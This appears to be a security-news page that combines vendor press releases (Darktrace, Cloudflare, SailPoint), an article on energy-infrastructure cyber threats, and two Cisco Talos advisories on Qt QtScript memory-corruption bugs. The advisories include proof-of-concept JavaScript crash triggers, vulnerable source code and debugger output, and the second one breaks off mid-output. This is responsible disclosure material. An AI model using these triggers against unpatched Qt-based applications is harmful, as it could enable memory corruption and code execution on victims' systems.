**CAMBRIDGE, England****,** **Jan. 12, 2023** **/PRNewswire/ --** Darktrace, a global leader in cyber security artificial intelligence, today released three new cyber-threat trend reports revealing 2022 attack data observed across its global customer fleet.1 The industry reports pertain to the energy, healthcare, and retail sectors respectively.

"These industry-specific reports are the first of their kind released by Darktrace, representing an important effort to surface the data underpinning the rapidly evolving threat landscape that we are defending against," commented Toby Lewis, Global Head of Threat Analysis, Darktrace.

"The trends reveal crucial sector-specific challenges, from the tendency for hackers to siphon off the energy sector's resources in the form of crypto\-jacking, through to the invaluable nature of patient data which leads to data exfiltration in the healthcare sector," commented Lewis. "The surge in credential-based attacks across the retail sector reflects the fact that identity theft will be a key trend for 2023, increasing the need for AI-based behavioral analytics for understanding employee actions in rich context and authenticating the actions taken using certain credentials."

**Energy Sector: Key Findings**

Against the backdrop of a global energy crisis, Darktrace's energy sector report reveals that illegal crypto\-mining threats,whereby bad actors steal energy and processing power from other devices and networks, are on the rise across the industry. Notable findings include:

*   High-priority crypto\-mining accounted for 13 times more of all observed cyber incidents in the UK energy sector in 2022 compared to 2021
*   High-priority crypto\-mining accounted for 3 times more of all observed cyber incidents in the US energy sector in 2022 compared to 2021

The report divulges two real-world crypto\-mining threat finds from a European and US energy organization respectively, which were both stopped by Darktrace's AI technology. In the former case, attackers were caught attempting to mass pool crypto\-mining capabilities using 5 internal servers at the organization.

**Retail Sector: Key Findings**

As online shopping remains popular, Darktrace's retail sector report reveals that over the course of 2022, criminals increasingly turned toward credential theft, spoofing and stuffing to target this multi-billion-dollar industry's online infrastructure. Notably:

*   Credential theft, spoofing and stuffing accounted for over 170% more of all observed cyber incidents in the US retail sector in 2022 compared to 2021
*   Credential theft, spoofing and stuffing accounted for over 14% more of all observed cyber incidents in the UK retails ector in 2022 compared to 2021
*   Credential theft, spoofing and stuffing accounted for over 70% more of all observed cyber incidents in the Australian retail sector in 2022 compared to 2021

One threat find in the report from August 2022 details the discovery of a never-before-seen attack tool lying dormant inside a well-known UK automotive retailer. Months before Darktrace had been adopted by the retailer, one of its devices had become infected with novel malware that lay dormant, establishing a foothold and waiting for the right time to launch an attack. After deployment, Darktrace AI caught the malware when it made multiple authentication attempts using spoofed credentials for one of the organization's security managers. If successful, the attack could have undermined the organization's entire security posture, allowing malicious software to gain control of the company's infrastructure from within.

**Healthcare Sector: Key Findings**

Often viewed as a 'soft target' for cyber-criminals, hospitals and other healthcare organizations are extremely rich data sources from which attackers can make a profit by selling patient information such as medical records, credit cards or banking details. Darktrace's healthcare sector report notably revealed:

*   Data exfiltration was one of the top 3 observed threats faced by healthcare providers globally, with organizations in the UK and Australia suffering an increased volume in 2022
*   The most common attack type observed across healthcare globally in 2022 was suspicious network scanning, a form of intelligence gathering which often constitutes the initial phase of a cyber-attack

The report details a real-world sophisticated threat faced by a US healthcare provider in which a malicious PowerShell script was discovered to be deployed on one of the organization's internal servers, an attempt to give bad actors remote control over the target network. The threat was autonomously thwarted by Darktrace's RESPOND™ technology before attackers could do harm.

**About Darktrace**

Darktrace (DARK.L), a global leader in cyber security artificial intelligence, delivers complete AI-powered solutions in its mission to free the world of cyber disruption. Breakthrough innovations from the Darktrace Cyber AI Research Centre in Cambridge, UK and its R&D centre in The Hague, The Netherlands have resulted in over 125 patent applications filed and significant research published to contribute to the cyber security community. Darktrace's technology continuously learns and updates its knowledge of 'you' for an organization and applies that understanding to achieve an optimal state of cyber security. It is delivering the first ever Cyber AI Loop, fuelling a continuous end-to-end security capability that can autonomously prevent, detect, and respond to novel, in-progress threats in real time. Darktrace employs over 2,200 people around the world and protects over 8,100 organizations globally from advanced cyber-threats. It was named one of TIME magazine's 'Most Influential Companies' in 2021.

The data pertains to the period January-October 2022 and is compared with the same period in 2021.

Darktrace Publishes 2022 Cyberattack Trend Data For Energy, Healthcare & Retail Sectors Globally

**SAN FRANCISCO -- (****BUSINESS WIRE****) --** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, today announced an expansion of its relationship with Microsoft to help customers easily deploy, automate, and enhance their organization’s Zero Trust security.

Working from anywhere is more common than ever, and critical applications have moved to the cloud—no longer residing inside an office protected by a secure perimeter. This fundamental shift in where and how people work has caused enterprises to rethink legacy tools and abandon the traditional castle-and-moat approach to security, looking towards Zero Trust instead. As CIOs continue to navigate this paradigm shift, Cloudflare has developed a new set of integrations with Microsoft to help organizations on this journey. Now, mutual customers can seamlessly deploy Zero Trust security tools in minutes, with no complex code changes, and add industry-first features, such as Cloudflare’s Remote Browser Isolation technology.

"When I speak with CIOs, I continue to hear that their number one concern remains security, closely followed by adapting to the new hybrid world,” said Matthew Prince, CEO and co-founder at Cloudflare. “We want to make it easier than ever for IT leaders to deploy Zero Trust security across the enterprise and keep users safe wherever they are working from. I’m thrilled that we are deepening our integration with Microsoft so we can help our joint customers easily deploy Zero Trust security across some of the most used applications in the workplace.”

Through these new integrations, Cloudflare now provides a comprehensive identity driven approach to protect applications, users, devices and networks from attacks. These integrations pair Microsoft Identity solutions and Cloudflare network security tools to create a quality Zero Trust offering.

“A cloud-native Zero Trust security model has become an absolute necessity as enterprises continue to adopt a cloud-first strategy,” said Joy Chik, President, Identity and Network Access, Microsoft. “Cloudflare has developed robust product integrations with Microsoft to help security and IT leaders prevent attacks proactively, dynamically control policy and risk, and increase automation in alignment with Zero Trust best practices.”

Cloudflare and Microsoft Azure Active Directory (Azure AD) customers can now:

*   **Deploy Zero Trust Security without changing one line of code:** Now joint customers can choose to define specific rules in either Azure AD or in Cloudflare Access i.e. which users can access specific applications based on various factors such as user risk level, device platform, location, etc. and enforce across both products without changing a line of code.
*   **Isolate high-risk users automatically with industry leading browser isolation technology:** By integrating Cloudflare’s Remote Browser Isolation with Azure AD, high-risk users, such as temporary employees, are contained proactively in a remote browser session for added security.
*   **Save IT teams hundreds of hours of manual work:** Cloudflare Access will use the System for Cross-Domain Identity Management (SCIM) to directly integrate with Azure AD. Groups are automatically synced across Cloudflare and Azure Active Directory platforms and groups, saving hundreds of hours of manual work from IT teams.
*   **Keep sensitive Government data off of the public Internet:** By connecting Azure Government Cloud to Cloudflare’s global network via the Secure Hybrid Access (SHA) program, Government customers (‘GCC’) will be able to keep sensitive traffic secure by staying off of the public Internet. Additionally, Government customers (‘GCC’) will be able to define and enforce granular rules defining who can access what using the joint solution from the dashboard without any code changes.

Cloudflare has worked with Microsoft since 2018 to provide mutual customers with an improved Internet experience by securing web applications and safeguarding employees with identity and device protections. Cloudflare’s deep integrations across Microsoft 365 and Azure have supported many of the largest Fortune 500 companies on their Zero Trust journey, enabling customers to simply and easily support their security and performance needs. Most recently, Microsoft named Cloudflare the winner of its Security Software Innovator of the Year award.

To learn more about Cloudflare’s integration with Microsoft, check out the resources below:

*   Blog: Expanding our collaboration with Microsoft: proactive and automated Zero Trust security for customers
*   Joint reference architecture
*   Joint Zero Trust Webinar
*   Microsoft landing page
*   Docs: Enable SCIM on the Zero Trust dashboard
*   Docs: Use multiple Azure AD Conditional Access Policies with Access
*   Docs: Isolate Azure AD risky users

**About Cloudflare**

Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements**

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding Cloudflare’s partnership with Microsoft and the potential resulting benefits to Cloudflare customers, the potential benefits to customers of integrating Cloudflare and Microsoft products, the potential opportunity for Cloudflare to attract additional customers and to expand sales to existing customers through Cloudflare’s product integrations with Microsoft, the expected functionality and performance of Cloudflare’s Zero Trust and other products and technology, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in Cloudflare’s filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that Cloudflare may make from time to time with the SEC.

The forward-looking statements made in this press release relate only to events as of the date on which the statements are made. Cloudflare undertakes no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. Cloudflare may not actually achieve the plans, intentions, or expectations disclosed in Cloudflare’s forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Expands Relationship With Microsoft

This move accelerates the company’s vision of becoming the de facto identity security platform of choice for the modern enterprise.

**AUSTIN, January 12, 2023 –** SailPoint Technologies, Inc., the leader in enterprise identity security, today announced it has acquired SecZetta, the leading provider of third-party identity risk solutions. With nearly half of today’s enterprises comprised of non-employees, organizations need to factor this growing group of identities into their approach to identity security. With SecZetta, SailPoint will help companies gain better visibility into all types of identities, across both employee and non-employee identities – from third-party contractors to temporary workers, and non-human identities – all from a single, market-leading identity security platform. This acquisition will give enterprises the centralized approach needed, plus the proper identity proofing required to fully validate non-employee identities across their businesses. 

"The enterprise identity landscape has changed significantly in the last few years. We went from a largely in-office workforce to a distributed, virtual workforce and now a hybrid workforce. On top of that, most enterprises no longer rely solely on full-time employees to keep their business running. Yet not all of these companies have considered how this change impacts their approach to identity security," said Grady Summers, EVP Product for SailPoint. "With SecZetta, we can quickly give our customers the consolidated intelligence and visibility they need to ensure proper oversight into all identities and their technology access needs, regardless of whether they are a full-time employee or not."

SailPoint and SecZetta have a long-standing partnership. Once SecZetta’s solutions are fully integrated into SailPoint’s Identity Security Cloud platform, SailPoint will deliver a unified platform to customers — providing context-rich identity information with the right level of intelligence needed to answer the "who should have access to what", "when" and "why" questions for this unique, often under-secured set of identities. With SecZetta, SailPoint will also be able to further help companies with identity consolidation efforts, merging and organizing workforce data across authoritative sources to create a centralized repository of identities.  This identity intelligence will then be offered as a packaged offering within the Identity Security Cloud platform to deliver the next generation of identity security — one that provides the critical layer of risk management and governance needed across both employee and non-employee identities from a single platform.

"Acquiring SecZetta allows us to quickly address an emerging threat to our customers’ business — and that is this gap in visibility over non-employee identities. Here at SailPoint, we want to be known as the kind of company our customers can always rely on to anticipate and solve for their needs as they continue to evolve," said Mark McClain, CEO and Founder, SailPoint.  "This announcement underscores our relentless focus on accelerating our vision of becoming the de facto identity security platform of choice that discovers, manages and secures all identities across the modern enterprise." 

**About SailPoint**

SailPoint is the leading provider of identity security for the modern enterprise. Enterprise security starts and ends with identities and their access, yet the ability to manage and secure identities today has moved well beyond human capacity. Using a foundation of artificial intelligence and machine learning, the SailPoint Identity Security Platform delivers the right level of access to the right identities and resources at the right time—matching the scale, velocity, and environmental needs of today’s cloud-oriented enterprise. Our intelligent, autonomous, and integrated solutions put identity security at the core of digital business operations, enabling even the most complex organizations across the globe to build a security foundation capable of defending against today’s most pressing threats.

SailPoint Acquires SecZetta to Provide Identity Security for Non-Employee Identities

Energy has become the new battleground for both physical and cyber security warfare, driven by nation-state actors, increasing financial rewards for ransomware gangs and decentralized devices. Chris Price reports.

The physical threat to the world's critical national infrastructure (CNI) has never been greater. At least 50 meters of the Nord Stream 1 and 2 underground pipelines that once transported Russian gas to Germany were destroyed in an attack in late September 2022, though it remains unclear who is to blame.

More recently, Russia has also shifted its war in Ukraine to targeting energy infrastructure with its own missiles and Iran-supplied Shahed-136 drones. According to a tweet from Ukraine's President Volodymyr Zelensky on Oct. 18, "30% of Ukraine's power stations have been destroyed, causing massive blackouts across the country," while on Nov. 1 during a meeting with the European Commissioner for Energy, Kadri Simson, Zelensky said that between "30% and 40% of \[the country's\] energy systems had been destroyed."

**Growing Cybersecurity Threat**

However, physical security threats resulting from the war in Ukraine and increasing tensions between East and West aren't the only serious threats to our CNI. There is a growing cybersecurity threat too. On May 7, 2021, the Colonial Pipeline that originates in Houston, Texas, and that carries gasoline and jet fuel to the southeastern US was forced to halt all of its operations to contain a ransomware attack.

In this attack, hackers gained entry through a VPN (virtual private network) account that allowed employees to access the company's systems remotely using a single username and password found on the Dark Web. Colonial paid the hackers, who were an affiliate of a Russia-linked cybercrime group Darkside, a $4.4 million ransom shortly after the attack.

Less than a year later, Sandworm, a threat group allegedly operated by the Russian cybermilitary unit of the GRU, attempted to prevent an unnamed Ukrainian power provider from functioning. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, \[and\] active network equipment," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement.

Slovak cybersecurity firm ESET, which collaborated with Ukrainian authorities to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware.

"The Sandworm attackers made an attempt to deploy the Industroyer2 malware against high-voltage electrical substations in Ukraine," ESET explained. The victim's power grid network was understood to have been penetrated in two waves, the initial compromise coinciding with the Russian invasion of Ukraine in February 2022 and a follow-up infiltration in April allowing the attackers to upload Industroyer2.

**Digitized Environments**

According to John Vestberg, CEO of Clavister, a Swedish company specializing in network security software, "it is now beyond doubt that cybercriminals pose an ever-increasing threat to critical national infrastructure." He adds: "CNI, such as oil and gas, is a prime target for ransomware gangs." He believes energy firms and their suppliers need to take a more proactive, rather than reactive, approach to cybersecurity using predictive analytics and tools like AI (artificial intelligence) and ML (machine learning) technologies.

Camellia Chan, CEO and founder of Flexxon brand X-PHY, agrees: "It's crucial that CNI organizations never take their eyes off the ball," she says. "Good cybersecurity is an ongoing, proactive, intelligent, and self-learning process and embracing emerging tech such as AI as part of a multilayered cybersecurity solution is essential to detect every type of attack and help create a more robust cybersecurity framework."

Nor are the well-organized, often state-sponsored, ransomware gangs the only problem CNI organizations face. Part of the issue is that as industrial organizations (including utilities such as water and energy companies) digitize their environments, they are exposing potential security weaknesses and vulnerabilities to threat actors much more than in the past.

**Integrated IT/OT Networks**

Whereas traditionally security was not viewed as being of critical importance because an organization's OT (operational technology) network was designed to be isolated, and also because it ran proprietary industrial protocols and custom software, this is no longer the case.

As Daniel Trivellato, VP of OT product engineering at Forescout, a cybersecurity automation software company, says: “OT environments have modernized and are no longer air-gapped from IT networks, meaning that they are more exposed and their lack of security measures poses a critical risk." In connecting these two environments, organizations are increasing the threat landscape but not necessarily putting in appropriate measures to mitigate the risk.

According to Trivellato, this hasn't gone "unnoticed by threat actors" with ICS- and OT-specific malware such as Industroyer, Triton, and Incontroller evidence of the increasingly sophisticated capabilities that attackers have begun to deploy in attacking, resulting in many serious incidents. "While most OT devices can't be patched out, there are practices to address the weaknesses such as device visibility and asset management, segmentation, and continuous monitoring of traffic," Trivellato adds.

**Grid Edge Risk**

For Trevor Dearing, director of critical infrastructure solutions at zero-trust segmentation company Illumio, part of the attraction to cybercriminals of attacking energy companies is the potentially high rewards on offer. "Many of the gangs are realizing that if they can prevent the service from being delivered to customers then companies are more likely to pay the ransom than if they are just stealing data," he says.

A further problem, he says, is that energy systems no longer just comprise the traditional grid including power stations and power lines. Instead, what's emerging is what's known as the "grid edge" — decentralized devices such as smart meters as well as solar panels and batteries in people's homes and businesses. Utah-based company sPower, which owns and operates over 150 generators in the US, was believed to be the first renewable energy provider to be hit by a cybersecurity attack in March 2019 when threat actors exploited a known flaw in Cisco firewalls to disrupt communications over a span of about 12 hours.

One way that renewable energy systems are particularly vulnerable to attack is through their inverters. Providing the interface between solar panels and the grid, these are used to convert the DC (direct current) energy generated by the PV (photovoltaic) solar panel into AC (alternating current) electricity provided to the mains. If the inverter's software isn't updated and secure, its data could be intercepted and manipulated in much the same way as previous attacks in Ukraine and the US. Furthermore, an attacker could also embed code in an inverter that could spread malware into the larger power system, creating even more damage.

According to Ali Mehrizi-Sani, associate professor at Virginia Polytechnic Institute and State University and co-author of a 2018 paper assessing the cybersecurity risk of solar PV, hackers can artificially create a malfunction in a PV system to launch cyberattacks to the inverter controls and monitoring system.

"This is a vulnerability that can be, and has been, exploited to attack the power system," he told online publication PV Tech in November 2020. And while currently the potential risk of a cybersecurity attack to solar power networks remains low because the technology hasn't yet reached critical mass, as it becomes more decentralized — with solar panels installed in public places and on top of buildings — managing networks will increasingly rely on robust, cloud-based IoT security.

**Greater Regulation**

One way that governments as well as organizations can ensure the highest levels of CNI protection is with the implementation of standards. For example, Germany put in IT security laws several years ago, making it mandatory for all network providers, operators, and other CNI businesses to ensure they meet the ISO 27001 family of standards for information security management systems (ISMS), while in the UK there are obligations stipulated in the BSI Criticality Ordinance to demonstrate a complete IT security strategy to secure the operation of critical infrastructure.

Similarly in the US, the NERC CIP (North American Electric Reliability Corporation Critical Infrastructure Protection) group of standards govern critical infrastructure of all entities that materially affect the BES (Bulk Electrical System) in North America — though this set of standards only applies to electricity and not to the oil and gas industries. According to Cliff Martin, head of cyber incident response at GRCI Law, a legal, risk, and compliance consultancy firm, staff who are responsible for CNI need to be trained accordingly and understand that their actions can have real consequences. "This means they can't simply copy and paste traditional IT cybersecurity measures over to the IT environment — it just doesn't work like that."

However, Illumio's Dearing says that what's happening is that more and more companies are developing a single strategy for both OT and IT environments. "The key," he says, "is to assume you are going to be breached and plan accordingly. If you segment by separating out all the different bits of your infrastructure, then an attack on one part isn't necessarily going to have a knock-on effect on all the other parts."

The war in Ukraine and attacks on the Nord Stream pipelines have alerted companies to the physical threat posed to energy infrastructure, especially during winter in the northern hemisphere. However, that's not the only concern. Cybersecurity attacks on CNI are increasing, partly because of a growing threat from nation-state actors but also because cybercriminals are realizing that they can make serious money from potentially denying a much-needed service to customers. At the same time, the convergence of OT and IT technologies is providing a potentially much greater attack surface for cybercriminals to target.

Whereas traditionally security has not been seen as a critical consideration for OT, this needs to change with an increased focus on technical solutions such as segmentation and continuous monitoring of network traffic if companies are going to prevent a potentially catastrophic breach to CNI from taking place.

_**—Story by Chris Price**_

_This story first appeared on_ _IFSEC Global__, part of the Informa Network, and a leading provider of news, features, videos, and white papers for the security and fire industry. IFSEC Global covers developments in long-established physical technologies — like video surveillance, access control, intruder/fire alarms, and guarding — and emerging innovations in cybersecurity, drones, smart buildings, home automation, the Internet of Things, and more._

Securing the World's Energy Systems: Where Physical Security and Cybersecurity Must Meet

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.4

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historically based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a Javascript argument spreading syntax via use of ... operator, where an array is spread into a list of arguments for a function call. QtScript’s implementation of argument spreading is vulnerable to a heap overflow. The vulnerability can be demonstrated with the following PoC Javascript code:

    var a = [] 
    a.length =  555840;
    Math.max(...a)
    

In the above code, a simple array is constructed and its length set to a large value. This array is then used in a function call with a spreading ... operator, which invokes spreading code in QtScript’s runtime:

    static CallArgs createSpreadArguments(Scope &scope, Value *argv, int argc)
    {
        ScopedValue it(scope);
        ScopedValue done(scope);
    
        int argCount = 0;
    
        Value *v = scope.alloc<Scope::Uninitialized>();                        [1]
        Value *arguments = v;                                                  [2]
        for (int i = 0; i < argc; ++i) {
            if (!argv[i].isEmpty()) {
                *v = argv[i];
                ++argCount;
                v = scope.alloc<Scope::Uninitialized>();
                continue;
            }
            // spread element
            ++i;
            it = Runtime::GetIterator::call(scope.engine, argv[i], /* ForInIterator */ 1);              [3]
            if (scope.hasException())
                return { nullptr, 0 };
            while (1) {
                done = Runtime::IteratorNext::call(scope.engine, it, v);                              [4]
                if (scope.hasException())
                    return { nullptr, 0 };
                Q_ASSERT(done->isBoolean());
                if (done->booleanValue())
                    break;
                ++argCount;                                                                       [5]
                v = scope.alloc<Scope::Uninitialized>();                                          [6]
            }
        }
        return { arguments, argCount };
    }
    

Above code implements the function that turns an array into a list of arguments to be passed into a function call. At \[1\] and \[2\] scoped allocation for arguments is made. At \[3\] an iterator through the input arguments is created and is then used at \[4\] inside an infinite while loop as long as there are elements. With each iteration, argCount is incremented at \[5\] and space for a new value is allocated at \[6\]. Allocation is performed via call to scope.alloc with no parameters, which ends up in the following code:

    QML_NEARLY_ALWAYS_INLINE Value *alloc() const
    {
        Value *ptr = engine->jsAlloca(1);
        switch (mode) {
        case Undefined:
            *ptr = Value::undefinedValue();
            break;
        case Empty:
            *ptr = Value::emptyValue();
            break;
        case Uninitialized:
            break;
        }
        return ptr;
    }
    

Above code allocates space for one more value on the runtime stack by simply incrementing the pointer, without performing any additional checks for available space. Therefore, in a call to createSpreadArguments, elements can keep being allocated until the buffer overflows into adjacent memory or a guard page is hit. This can result in adjacent memory overwrite. Additionally, since the contents of the sparse array being spread is under control, a precise value being written out of bounds can easily be controlled (empty array entries result in zeros being written into v pointer, where non-zero depends on the type, primitive types being written verbatim).

Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**Crash Information**

    ==1198788==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7ffff52c2000 (pc 0x00000091f222 bp 0x00000159db70 sp 0x7fffffffd250 T1198788)
    ==1198788==The signal is caused by a WRITE memory access.
        #0 0x91f222 in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f222)
        #1 0x91f00d in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f00d)
        #2 0x8fff92 in QV4::IteratorPrototype::createIterResultObject(QV4::ExecutionEngine*, QV4::Value const&, bool) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8fff92)
        #3 0xda0d8b in QV4::ArrayIteratorPrototype::method_next(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda0d8b)
        #4 0x9803ac in QV4::Runtime::IteratorNext::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9803ac)
        #5 0x986f8e in QV4::createSpreadArguments(QV4::Scope&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986f8e)
        #6 0x986cf7 in QV4::Runtime::CallWithSpread::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value const&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986cf7)
        #7 0x9d8804 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d8804)
        #8 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #9 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #10 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #11 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #12 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #13 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #14 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

**TIMELINE**

2022-11-10 - Initial Vendor Contact

2022-11-10 - Vendor Disclosure

2023-01-12 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2022-43591: TALOS-2022-1650 || Cisco Talos Intelligence Group

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.3.2.

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-190 - Integer Overflow or Wraparound

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historicaly based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a set of Reflect Javascript APIs and methods such as Reflect.apply(), which contains an integer overflow vulnerability. The vulnerability can be demonstrated with the following PoC Javascript code:

const v1 = [];
const v3 = [];
v3.length = 3900000000;
Reflect.apply(v1.reverse,v1,v3);

In the above code, two arrays are constructed. The second array has its length property set to a large number. Method Refclect.apply takes three arguments. First is the function to be “applied”, second is the object to which the function is to be applied and third is supposed to be an array of potential arguments to the function. In this example, method reverse of an Array object is being applied, with a task to simply reverse the array. The vulnerability is triggered even though method reverse doesn’t expect or use the array v3. The root cause of the vulnerability can be seen in the following source code:

    static CallArgs createListFromArrayLike(Scope &scope, const Object *o)
    {
        int len = o->getLength();                                                                                       [3]
        Value *arguments = scope.alloc(len);                                                                            [4]
    
        for (int i = 0; i < len; ++i) {
            arguments[i] = o->get(i);                                                                                      [5]
            if (scope.hasException())
                return { nullptr, 0 };
        }
        return { arguments, len };
    }
    
        ReturnedValue Reflect::method_apply(const FunctionObject *f, const Value *, const Value *argv, int argc)             [0]
    {
        Scope scope(f);
        if (argc < 3 || !argv[0].isFunctionObject() || !argv[2].isObject())
            return scope.engine->throwTypeError();
    
        const Object *o = static_cast<const Object *>(argv + 2);
        CallArgs arguments = createListFromArrayLike(scope, o);                                                              [1]
        if (scope.hasException())
            return Encode::undefined();
    
        return checkedResult(scope.engine, static_cast<const FunctionObject &>(argv[0]).call(                               [2]
                    &argv[1], arguments.argv, arguments.argc));
    }
    

In the above code quote we can observe the implementation of Reflect.apply method starting at \[0\]. After some sanity checking, the code at \[1\] takes the 3rd argument to apply() and tries to turn it into a list from an array-like object via createListFromArrayLike. Finally, at \[2\], a call to the target function (reverse in our PoC) is made. The core of the issue lies in the createListFromArrayLike function. In it, at \[3\], the length of the array (3900000000 in our PoC) is retrieved and used in an allocation at \[4\]. Note that len is a signed integer. Further, len is again used at \[5\] as a guard in a for loop that tries to copy the elements. The actual integer overflow happens during a call at \[4\], which indirectly leads to the following code:

    QML_NEARLY_ALWAYS_INLINE Value *jsAlloca(int nValues) {
        Value *ptr = jsStackTop;
        jsStackTop = ptr + nValues;
        return ptr;
    }
    

In the above code, to allocate the memory for the list, a number of values is simply added to a pointer. Since pointers are 8 bytes in size, the compiler will implicitly multiply the length by 8 to satisfy pointer arithmetic rules. With a large value for v3.length this can lead to an integer overflow and wraparound during allocation. This integer overflow then leads to further memory corruption. The exact point of integer overflow can be observed in the debugger (do note that most of the above-quoted functions are actually inlined):

    Breakpoint 16, 0x000000000096bfbb in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/10i $pc
    => 0x96bfbb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+203>:    mov    rdi,QWORD PTR [r13+0x8]                      [6]
       0x96bfbf <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+207>:    movsxd rax,ebp
